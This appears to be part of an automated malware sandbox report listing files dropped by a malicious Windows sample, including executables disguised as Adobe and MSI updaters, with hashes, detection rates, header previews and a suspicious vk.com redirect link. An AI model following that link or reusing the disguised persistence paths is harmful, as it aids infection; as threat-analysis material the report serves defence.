                                                                                                                                                                                  https://vk.com/away.php?to=https%3A%2F%2Fhhu.tmw.temporary.site%2Fwp-includes%2Fmyevri&post=809587144_14&cc_key=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 204.79.197.203

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  No context

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  No context

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\ProgramData\MPGPH131\MPGPH131.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2328576
                                                                                                                                                                                  Entropy (8bit):7.963129291166755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:ov+pa5Mxg2VmKxuou1saUJ3iuL+y8g9Rdi8ZNaFwbdwUdUL:1pa5Mx9oKhaKdL+Lgo8ZoF0dw5L
                                                                                                                                                                                  MD5:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  SHA1:FA534E53D645F69D1C950D8FF17E11E877CA970B
                                                                                                                                                                                  SHA-256:B50BECDB79B109E85CAA4F588343FDD7E96152F4E23F40AD213A0336118BC87B
                                                                                                                                                                                  SHA-512:783CEE4A35DAB87271A126B8AE46F41E636FF9AFEB2DC5620723FED828C4C72F991127FF7B8FD1DE287CB8F63B825FE0EBEDA7585B66ACD1411B7050B2F1BDA9
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....L.......0Z...........@..........................`Z.......#...@.................................T...h....p..h1.......................................................................................................... . .`..........................@....rsrc...h1...p......................@....idata ............................@... ..,.........................@...awogigmw.P....?..D..................@...nkfwixkm..... Z......`#.............@....taggant.0...0Z.."...f#.............@...........................................................................................................................................................................................

                                                                                                                                                                                  C:\ProgramData\MPGPH131\MPGPH131.exe:Zone.Identifier

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                  C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                  C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_46742503-b71c-4880-baae-e12f5a511087.json (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7528
                                                                                                                                                                                  Entropy (8bit):5.159137026830408
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:lABMiBd2cbhbVbTbfbRbObtbyEl7nKJA6unSrDtTZdxSofQ:CibcNhnzFSJ51nSrDhZdxE
                                                                                                                                                                                  MD5:BED1D8537E2E66E11D4A1E0F788BABA5
                                                                                                                                                                                  SHA1:AE59276119189B3D7852EC83D7D9ECC59F0472AC
                                                                                                                                                                                  SHA-256:D83B2A7D8AEC8CC7B8FF24A88C786CEE53F516B7391FDF8A0FD23C319C6B2905
                                                                                                                                                                                  SHA-512:6B1C1AE0108CA6DFA7F1E9824EC2CF7D6965810EEFB96E8C02795CB7D9E78B6996EFA645949665567C328A47FA73C3FFE20BF1AB80C77FF43D5754A57ABA692D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"type":"uninstall","id":"46742503-b71c-4880-baae-e12f5a511087","creationDate":"2024-02-21T12:44:56.450Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"7340e351-fad3-4a0f-b554-971fbfafe8fb","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I

                                                                                                                                                                                  C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_46742503-b71c-4880-baae-e12f5a511087.json.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7528
                                                                                                                                                                                  Entropy (8bit):5.159137026830408
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:lABMiBd2cbhbVbTbfbRbObtbyEl7nKJA6unSrDtTZdxSofQ:CibcNhnzFSJ51nSrDhZdxE
                                                                                                                                                                                  MD5:BED1D8537E2E66E11D4A1E0F788BABA5
                                                                                                                                                                                  SHA1:AE59276119189B3D7852EC83D7D9ECC59F0472AC
                                                                                                                                                                                  SHA-256:D83B2A7D8AEC8CC7B8FF24A88C786CEE53F516B7391FDF8A0FD23C319C6B2905
                                                                                                                                                                                  SHA-512:6B1C1AE0108CA6DFA7F1E9824EC2CF7D6965810EEFB96E8C02795CB7D9E78B6996EFA645949665567C328A47FA73C3FFE20BF1AB80C77FF43D5754A57ABA692D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"type":"uninstall","id":"46742503-b71c-4880-baae-e12f5a511087","creationDate":"2024-02-21T12:44:56.450Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"7340e351-fad3-4a0f-b554-971fbfafe8fb","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I

                                                                                                                                                                                  C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\14fde6f2-3d73-4373-895b-21b54092c52f.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):44898
                                                                                                                                                                                  Entropy (8bit):6.095204755186144
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWXHi1zNtTDmNMahWz9KJDSgzMMd6qD47u3+Ciob:+/Ps+wsI7ynfmgKtSmd6qE7lFob
                                                                                                                                                                                  MD5:475969CAA3ABC3B87BBA8A06A26416EC
                                                                                                                                                                                  SHA1:1F0D12C224795390E1996FF32EFB38B826D05D32
                                                                                                                                                                                  SHA-256:E5251D710E1B5A6A7F2F56B3C0253ED7D56F144521190BB45A2C2BD119397B75
                                                                                                                                                                                  SHA-512:5FE095478DBBFDE8C4C96BA5377667647E7329DA927A1AA81941A49A69C305C66F6FBE62DF71CEAD702F09AB558652826CC142D1537A8DD6185E9830AAC81C0C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\26af1f3f-3ded-4faa-b6f1-e583d733ac4a.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092413418838823
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKy4Zi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOKAMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:663922852B080F86C0AB00AEE929BBAD
                                                                                                                                                                                  SHA1:B827C2D43AA11C27CF94F6D0B7D4719E98643AE6
                                                                                                                                                                                  SHA-256:658277912E96925F1B631C3375E5A30398EE17CCE4C77A48D76BCB5939BC6A0F
                                                                                                                                                                                  SHA-512:D0ACDCD583C1A43581B37B7DF6735C280E35317DE18357D152D1D2A0ED02DF15E6E554D2CAFE425B908D720C51F5625ED2F99B40199005154D75C673EF73BD33
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\39c63f2a-75e2-461e-8831-ec5e020ca3b0.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089793521976957
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWwdi1zNtPMPkzZ7okEt9r1JDSgzMMd6qD47u3+Ciob:+/Ps+wsI7ynQ0kzItSmd6qE7lFob
                                                                                                                                                                                  MD5:86BB2AEBE6542FECF0EE38A0E716C884
                                                                                                                                                                                  SHA1:BF3F38DD1B6B36C60F921CDB1B25E5AFFDE62175
                                                                                                                                                                                  SHA-256:A6B3CDCD85C26BAA92E40DE5B4DC338F7DF051BA1116685FE277ED35477392E0
                                                                                                                                                                                  SHA-512:434B38376BF139971C5AD7E9E190A7330D7BF3040EC4832341CD0F8FE570EA511D65018241C1B735C7A6DD3EA449CD7541B025BDF04C7961396344F12010E924
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\40a55814-2ab4-4758-b588-4b7ebb7c0625.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45888
                                                                                                                                                                                  Entropy (8bit):6.092481644253239
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKBOpi1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOK1zKtSmd6qE7lFov
                                                                                                                                                                                  MD5:553D96DF72F739CE4A609991683B90E1
                                                                                                                                                                                  SHA1:78F7470F8E4B9EAE5518DC6F4B6D89AF532C1BB9
                                                                                                                                                                                  SHA-256:5163A41C631CCA370068EBE6E45F0D4C6F99BF8BBB7BDFB9C869741877960142
                                                                                                                                                                                  SHA-512:EC3789B79E064BAA24B0067E04C39B0E217F621E1FC14C7C9C2464A5C355EBCF1CE054954E8FC3E59D7BE78B97C40CF766053F706A65FFD16512B0767E684E3E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\457a6ee4-0e98-4571-9c72-76a7c60b72d2.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092416626233074
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKy1li1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOKDMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:23E57DDF9B2D0E63C947E1A16FA37D40
                                                                                                                                                                                  SHA1:5BE1AE4A447D17A0712AB4D3897C3B745C874370
                                                                                                                                                                                  SHA-256:18D6611C69A7A950680D0ED1C9A99D331B40580BAFA3121275412FF51D178925
                                                                                                                                                                                  SHA-512:8957945C563109D5A91E61FA3CC698BF79856A61C392CE8FEB265B16EA20442F7D8BF47BDE2B8DE064AA17E54F40A280AA73DF58CA061D75EF8F3122B35095EB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\62b0f335-81cd-48e2-b542-cc9aed45cd9b.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44902
                                                                                                                                                                                  Entropy (8bit):6.095884668343846
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWNmi1zNt2CNoaLFQP9uKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynabKtSmd6qE7lFoC
                                                                                                                                                                                  MD5:63F3469CA792E17C27937C9F6982B83C
                                                                                                                                                                                  SHA1:2F18E896574CBE286F76F2142DF29A2FF08F9C0E
                                                                                                                                                                                  SHA-256:9D9DF2CBC69471290192A3FC50441758B6A7AB75E75504DB533D7F39C3637B82
                                                                                                                                                                                  SHA-512:259AA6D4AD784769334FA03451AE7CFB132D82078CB1A3E3E45032F530A565891F19EFBD7CCE7A43EF5A6125CDA6DFEE8F60A76C228AA6A3CFCDCBB311948B97
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\62f864ea-2355-4d87-b0a4-2a8732003286.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.092381521136022
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKy6Vi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOKqMKtSmd6qE7lFov
                                                                                                                                                                                  MD5:C68941913EB28F0802D81D3E8FD1B4BF
                                                                                                                                                                                  SHA1:3F07B5201E791BCE310542BAD7CF6CC14016F40B
                                                                                                                                                                                  SHA-256:1858F8BED52352C8616CF53DAB33C97B8013E8E17D2C17A7DCC57EE4D412159C
                                                                                                                                                                                  SHA-512:A8FB8E40F0C3FB3360885DBDF4D5E1873BAE2FCCF6E0F88D3BD60E1288476C25F5DAC2704A04C4EC07A40B6F07B621ACF2CEDEB5DFFEF52A05D850B033F19DC0
                                                                                                                                                                                  Malicious:false
